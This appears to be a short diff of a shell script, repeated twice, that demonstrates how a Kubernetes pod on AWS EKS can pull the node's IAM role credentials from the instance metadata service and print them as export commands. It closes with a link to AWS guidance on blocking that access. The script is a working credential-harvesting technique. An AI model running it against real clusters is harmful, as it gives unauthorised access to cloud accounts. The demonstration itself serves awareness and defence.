mlafeldt · February 25, 2021 10:59
diff --git a/run.sh b/run.sh
 # kubectl run my-shell --rm -it --restart=Never --image alpine --command sh
 apk add curl jq
 BASEURL=http://169.254.169.254/latest/meta-data
 ROLE=$(curl -s $BASEURL/iam/security-credentials)
 CREDS=$(curl -s $BASEURL/iam/security-credentials/$ROLE)
 AZ=$(curl -s $BASEURL/placement/availability-zone)
 echo "export AWS_REGION=${AZ::-1}"; echo "$CREDS" | jq -r '{AWS_ACCESS_KEY_ID: .AccessKeyId, AWS_SECRET_ACCESS_KEY: .SecretAccessKey, AWS_SESSION_TOKEN: .Token} | to_entries | .[] | "export " + .key + "=" + .value'
 # Paste the result into any shell and run `aws sts get-caller-identity` etc.
 # What you can do about it:
 # https://docs.aws.amazon.com/eks/latest/userguide/best-practices-security.html#restrict-ec2-credential-access
	# kubectl run my-shell --rm -it --restart=Never --image alpine --command sh
	apk add curl jq
	BASEURL=http://169.254.169.254/latest/meta-data
	ROLE=$(curl -s $BASEURL/iam/security-credentials)
	CREDS=$(curl -s $BASEURL/iam/security-credentials/$ROLE)
	AZ=$(curl -s $BASEURL/placement/availability-zone)
	echo "export AWS_REGION=${AZ::-1}"; echo "$CREDS" \| jq -r '{AWS_ACCESS_KEY_ID: .AccessKeyId, AWS_SECRET_ACCESS_KEY: .SecretAccessKey, AWS_SESSION_TOKEN: .Token} \| to_entries \| .[] \| "export " + .key + "=" + .value'
	# Paste the result into any shell and run `aws sts get-caller-identity` etc.
	# What you can do about it:
	# https://docs.aws.amazon.com/eks/latest/userguide/best-practices-security.html#restrict-ec2-credential-access